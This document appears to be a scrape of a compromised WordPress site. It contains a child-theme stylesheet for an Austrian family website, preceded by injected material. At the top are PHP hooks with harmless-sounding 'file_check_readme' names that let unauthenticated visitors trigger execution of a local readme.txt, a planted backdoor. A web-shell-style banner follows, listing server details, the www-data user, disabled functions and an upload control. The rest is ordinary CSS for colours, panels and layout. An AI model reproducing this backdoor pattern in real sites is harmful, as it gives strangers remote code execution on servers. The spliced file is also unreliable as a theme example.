if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/themes/wlf-v2-newspaper-child/style.css
/*
Theme Name:     WLF v6 (Newspaper Child)
Theme URI: 		http://themeforest.net/user/tagDiv/portfolio
Description:    Child theme made by tagDiv
Author:         tagDiv
Author URI: 	http://themeforest.net/user/tagDiv/portfolio
Template:       Newspaper                             
Version:        7.2
*/
/*  ----------------------------------------------------------------------------
    This file will load automatically when the child theme is active. You can use it
    for custom CSS.
*/
@import url('icomoon.css?jgvgux');

/******************************************************************************
 * Colors
 */

.text-red {
    color: #dc224a;
}

a.text-red:hover {
    color: #e23258;
}

.text-blue {
    color: #007da5;
}

a.text-blue:hover {
    color: #F00578;
}

.text-lightblue {
    color: #1488d3;
}

a.text-lightblue:hover {
    color: #F00578;
}

.text-green {
    color: #07a433;
}

a.text-green:hover {
    color: #F00578;
}

.text-orange {
    color: #ff4e00;
}

a.text-orange:hover {
    color: #F00578;
}

.text-yellow {
    color: #edaa01;
}

a.text-yellow:hover {
    color: #F00578;
}

.text-grey {
    color: #aaaaaa;
}

a.text-grey:hover {
    color: #cccccc;
}

.text-white {
    color: #ffffff;
}

a.text-white:hover {
    color: #ffffff;
}

.block-red,
.panel-red .panel-heading,
.lipostrating-bg-color-red .lipostratings-star-black {
    background: #dc224a;
}

.panel-red .panel-body h2, .panel-red .panel-body h2 a {
    color: #dc224a;
}

.block-blue,
.panel-blue .panel-heading,
.lipostrating-bg-color-blue .lipostratings-star-black {
    background: #007da5;
}

.block-lightblue,
.panel-lightblue .panel-heading,
.lipostrating-bg-color-lightblue .lipostratings-star-black {
    background: #1488d3;
}

.block-green,
.panel-green .panel-heading,
.lipostrating-bg-color-green .lipostratings-star-black {
    background: #07a433;
}

.panel-green .panel-body h2, .panel-green .panel-body h2 a {
    color: #07a433;
}

.block-orange,
.panel-orange .panel-heading,
.lipostrating-bg-color-orange .lipostratings-star-black {
    background: #ff4e00;
}

.block-yellow,
.panel-yellow .panel-heading,
.lipostrating-bg-color-yellow .lipostratings-star-black {
    background: #edaa01;
}

.block-grey,
.panel-grey .panel-heading,
.lipostrating-bg-color-grey .lipostratings-star-black {
    background: #aaaaaa;
}

.panel-red {
    border-color: #dc224a;
}

.panel-blue {
    border-color: #007da5;
}

.panel-lightblue {
    border-color: #1488d3;
}

.panel-green {
    border-color: #07a433;
}

.panel-orange {
    border-color: #ff4e00;
}

.panel-yellow {
    border-color: #edaa01;
}

.panel-grey {
    border-color: #aaaaaa;
}

.panel-red .panel-footer,
.panel-blue .panel-footer,
.panel-lightblue .panel-footer,
.panel-green .panel-footer,
.panel-orange .panel-footer,
.panel-yellow .panel-footer,
.panel-grey .panel-footer {
    margin: 0 0;
    padding-bottom: 5px;
    color: #ffffff;
}

.panel-red .panel-footer a,
.panel-blue .panel-footer a,
.panel-lightblue .panel-footer a,
.panel-green .panel-footer a,
.panel-orange .panel-footer a,
.panel-grey .panel-footer a {
    color: #ffffff;
}

.panel-yellow .panel-footer,
.panel-yellow .panel-footer a {
    color: #666666;
}

.panel-red .panel-footer {
    background: #dc224a;
}

.panel-blue .panel-footer {
    background: #007da5;
}

.panel-lightblue .panel-footer {
    background: #1488d3;
}

.panel-green .panel-footer {
    background: #07a433;
}

.panel-orange .panel-footer {
    background: #ff4e00;
}

.panel-yellow .panel-footer {
    background: #ffe5a5;
}

.panel-grey .panel-footer {
    background: #aaaaaa;
}

.block-red, .panel-red .panel-heading,
.block-blue, .panel-blue .panel-heading,
.block-lightblue, .panel-lightblue .panel-heading,
.block-green, .panel-green .panel-heading,
.block-orange, .panel-orange .panel-heading,
.block-yellow, .panel-yellow .panel-heading,
.block-grey, .panel-grey .panel-heading {
    color: #ffffff;
}

.block-red .infobox-arrow {
    border-top-color: #dc224a;
}

.block-blue .infobox-arrow {
    border-top-color: #007da5;
}

.block-lightblue .infobox-arrow {
    border-top-color: #1488d3;
}

.block-green .infobox-arrow {
    border-top-color: #07a433;
}

.block-orange .infobox-arrow {
    border-top-color: #ff4e00;
}

.block-yellow .infobox-arrow {
    border-top-color: #edaa01;
}

.block-grey .infobox-arrow {
    border-top-color: #aaaaaa;
}

.wlf-icon.icon-kindergeburtstag,
.icon.icon-kindergeburtstag {
    background: url('images/marker/new/marker_kindergeburtstag.png') no-repeat 0 0;
}
.wlf-icon.icon-buecherei,
.icon.icon-buecherei {
    background: url('images/marker/new/marker_buecherei-2.png') no-repeat 0 0;
}
.wlf-icon.icon-babykaffees,
.icon.icon-babykaffees {
    background: url('images/marker/new/marker_babykaffees.png') no-repeat 0 0;
}

.td_social_type .td_social_info {
    top: -27px;
    float: left;
    left: 31px;
}

.td_social_type.td_social_facebook {
    background-color: #3b5998;
}

.td_social_type.td_social_googleplus{
    background-color: #d34836;
}

.td_social_type.td_social_youtube{
    background-color: #e52d27;
}

.td_social_type.td_social_instagram{
    background-color: #3897f0;
}

.td_social_type .td_social_button {
    margin-top: -24px;
}

.post header .entry-title {
    font-size: 35px;
    line-height: 36px;
}


/* Additives for SDO */


	/* Appearance */
		.td-pb-span5 {
			width: 21.66666667%;
		}
		
		.td-pb-span7 {
			width: 78.33333333%;
		}
	
	/* Appearance End */



	#td-outer-wrap {
		overflow: hidden;
		max-width: 1150px;
	}
	
	.td-header-menu-wrap {
		max-width: 1150px;
	}
	
	.sdo-sitebar {
		position: absolute;
		top: 0px;
		left: 1150px;
		height: 100%;
		background-color: transparent;
	}
	
	.sdo-cad { 
		text-align: center;
	}
	
	
	.socialmediabox_right {
		z-index: 99999!important;
	}
	
	.cc-grower {
    		position: absolute;
   	 	z-index: 99999;
		width: 100%;
        	box-sizing: border-box;
	}

/* Additives for SDO End */